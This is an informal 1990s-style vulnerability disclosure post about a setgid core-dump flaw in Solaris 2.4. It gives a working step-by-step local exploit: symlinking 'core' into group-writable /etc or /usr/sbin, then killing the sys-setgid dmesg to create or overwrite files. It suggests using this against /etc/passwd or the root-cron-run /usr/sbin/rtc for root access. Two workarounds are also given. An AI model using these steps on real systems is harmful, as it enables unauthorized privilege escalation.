setgid Core dumping vulnerability in Solaris 2.4

From: Jungseok Roh 


 I think this bug is widely spreaded in Korea . but not all over the world.
 The following contents are wholly from SeokChan Lee,  one of the best alu
 mnus of the legendaray security task force team .K** .
 Also whom I look up to ..:)

 The problem is the Core dump system of Zolaris 2.4 .
 let's look into the man page of core(4) . and then concentrate on one phr-
 ase .

core(4)                   File Formats                    core(4)
NAME
     core - core image file
DESCRIPTION
     The operating system writes out a core image  of  a  process
     when  it  is  terminated due to the receipt of some signals.
     The core  image  is  called  core  and  is  written  in  the
     process's  working  directory  (provided  it  can be; normal
     access controls apply).  A process with an effective user ID
     different  from  the  real  user  ID will not produce a core
     image.

  NOTICE the last phrase !!

  A PROCESS with an effective user ID different from the real user ID will
  NOT produce a core image . That's very important in Security phase .
  If such systmem be not SET , We can make a core file anywhere ....
  Just killing the signal .. ( U knows why i use the term KILL )..

  * Now just Sightsee  the file system..
    another INTERESTING stuff in file system detected.

[cosmos:beren] uname -a
SunOS cosmos 5.4 Generic_101945-32 sun4m sparc
[cosmos:beren] ls -ald /etc
 $)C
   8 drwxrwxr-x  25 root     sys         3584  7 ?y  25 @O   18:46 /etc/
[cosmos:beren] ls -ald /usr
   2 drwxrwxr-x  30 root     sys         1024  7 ?y   5 @O   17:26 /usr/
[cosmos:beren] ls -ald /usr/sbin
  10 drwxrwxr-x   4 root     bin         4608  5 ?y  18 @O   03:38 /usr/sbin/
[cosmos:beren] ls -ald /usr/sbin
  10 drwxrwxr-x   4 root     bin         4608  5 ?y  18 @O   03:38 /usr/sbin/

  ****  It's GROUP WRITABLE !!  *****

  Most of u guys know what I about to say ..
  Main Idea is ..
  "Let's stab that file system at back using the sword , SGIDed utils.. "
  then let's traverse the file system and then take the sword ..

[cosmos:beren] find /usr -perm -2000 \( -group sys -o -group bin \) -ls
  ...

  its sword family is dmesg , netstat and all that .
  then take "dmesg" as the sword .

[cosmos:beren] ls -al /usr/sbin/dmesg
  12 -r-xr-sr-x   1 bin      sys         5520 1994  Jul 15 /usr/sbin/dmesg*

  It's sys SGIDed.

[cosmos:beren] ln -s /etc/SOMETHING core
[cosmos:beren] stty ^\^\
[cosmos:beren] pwd
/tmp
[cosmos:beren] dmesg
/* then slightly after u type this command kill it . using stty ^\^\
   there comes the following results */
^C (Core dumped)
[comos:beren] ls /etc/SOMETHING
SOMETHING

like this way u can overwrite /etc/passwd or do any operation on them.
if u runs sparc Zolaris 2.4 look at the root's crontab file .
see it ..! definately it contains the next phrase ..

# The rtc command is run to adjust the real time clock if and when
1 2 * * * [ -x /usr/sbin/rtc ] && /usr/sbin/rtc -c > /dev/null 2>&1

rtc is used in zolaris x86.

so u can make /usr/sbin/rtc as the exploitation script . and can do anythin.

U Can fix this problem.. "Two ways.."
but These two TEMPORARY FIXING has drawbacks on its phase.

1. Just blow up the Group - writable bit on each file system..
  ** but there occurs  a problem when PATCH is needed..
   I don't know what problem would be occur ..
   but the GURU seokchan Lee notified me that .

2. echo "set coredefault=0" >> /etc/system
  ** but it makes CoreDump disable..
   might be Not a good method if you develop somethin. and wanna view core.

 I don't know sun made a patch on this effect.
 It doesn't work on Zolaris 2.5 .. I tested it.

__

  Beren .. it the lost tales ....

 JungSeok Roh /  Junior in KAIST management Dep. / beren@cosmos.kaist.ac.kr